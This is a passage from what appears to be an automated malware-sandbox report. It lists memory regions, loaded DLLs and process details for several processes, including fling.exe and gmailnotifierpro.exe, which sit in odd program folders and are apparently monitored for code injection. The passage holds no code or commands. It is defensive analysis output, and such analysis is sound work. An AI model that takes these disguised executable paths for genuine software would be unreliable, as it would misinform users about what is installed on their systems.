monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1951 start_va = 0x3a0000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1952 start_va = 0x3b0000 end_va = 0x3c6fff monitored = 0 entry_point = 0x3b14a1 region_type = mapped_file name = "flashfxp.exe" filename = "\\Program Files\\MSBuild\\flashfxp.exe" (normalized: "c:\\program files\\msbuild\\flashfxp.exe") Region: id = 1953 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1954 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1955 start_va = 0x7c0000 end_va = 0x947fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 1956 start_va = 0x950000 end_va = 0xad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 1957 start_va = 0xae0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 1958 start_va = 0x1f50000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 1959 start_va = 0x1f60000 end_va = 0x201bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f60000" filename = "" Region: id = 1960 start_va = 0x20a0000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 1961 start_va = 0x20b0000 end_va = 0x2a73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020b0000" filename = "" Region: id = 1962 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1963 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1964 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1965 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1966 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1967 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1968 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1969 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1970 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1971 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1972 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1973 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1974 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1975 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1976 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1977 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1978 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1979 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1980 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1981 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1982 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1983 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1984 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1985 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1986 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1987 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 1989 start_va = 0x2a80000 end_va = 0x2bd6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a80000" filename = "" Thread: id = 103 os_tid = 0xf40 Process: id = "18" image_name = "fling.exe" filename = "c:\\program files (x86)\\internet explorer\\fling.exe" page_root = "0x3687d000" os_pid = "0x89c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\fling.exe\" " cur_dir = "C:\\Program Files (x86)\\Internet Explorer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1990 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1991 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1992 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1993 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1994 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1995 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1996 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1997 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1998 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1999 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2000 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2001 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2002 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2003 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2004 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 2005 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 2006 start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 2007 start_va = 0xa10000 end_va = 0xa26fff monitored = 0 entry_point = 0xa114a1 region_type = mapped_file name = "fling.exe" filename = "\\Program Files (x86)\\Internet Explorer\\fling.exe" (normalized: "c:\\program files (x86)\\internet explorer\\fling.exe") Region: id = 2008 start_va = 0xa30000 end_va = 0xbb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 2009 start_va = 0xbc0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 2010 start_va = 0x1fc0000 end_va = 0x207bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fc0000" filename = "" Region: id = 2011 start_va = 0x20c0000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 2012 start_va = 0x20d0000 end_va = 0x2a93fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020d0000" filename = "" Region: id = 2013 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2014 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2015 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2016 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2017 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2018 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2019 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2020 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2021 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2022 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2023 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2024 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2025 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2026 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2027 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2028 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2029 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2030 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2031 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2032 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2033 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2034 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2035 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2036 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2037 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2038 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2040 start_va = 0x510000 end_va = 0x671fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Thread: id = 104 os_tid = 0x9b0 Thread: id = 105 os_tid = 0xb94 Process: id = "19" image_name = "gmailnotifierpro.exe" filename = "c:\\program files (x86)\\microsoft office\\gmailnotifierpro.exe" page_root = "0x37b9d000" os_pid = "0xbbc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\gmailnotifierpro.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft Office\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2041 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2042 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2043 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2044 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2045 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2046 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2047 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2048 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2049 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2050 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2051 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2052 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2053 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2054 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 2055 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 2056 start_va = 0x620000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 2057 start_va = 0x820000 end_va = 0x9a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 2058 start_va = 0x9b0000 end_va = 0xa6bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 2059 start_va = 0xa90000 end_va = 0xaa6fff monitored = 0 entry_point = 0xa914a1 region_type = mapped_file name = "gmailnotifierpro.exe" filename = "\\Program Files (x86)\\Microsoft Office\\gmailnotifierpro.exe" (normalized: "c:\\program files (x86)\\microsoft office\\gmailnotifierpro.exe") Region: id = 2060 start_va = 0xab0000 end_va = 0xc30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 2061 start_va = 0xc40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 2062 start_va = 0x2210000 end_va = 0x221ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 2063 start_va = 0x2220000 end_va = 0x2be3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002220000" filename = "" Region: id = 2064 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2065 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2066 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2067 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2068 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2069 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2070 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2071 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2072 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2073 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2074 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2075 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2076 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2077 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2078 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2079 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2080 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2081 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2082 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2083 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2084 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2085 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2086 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = 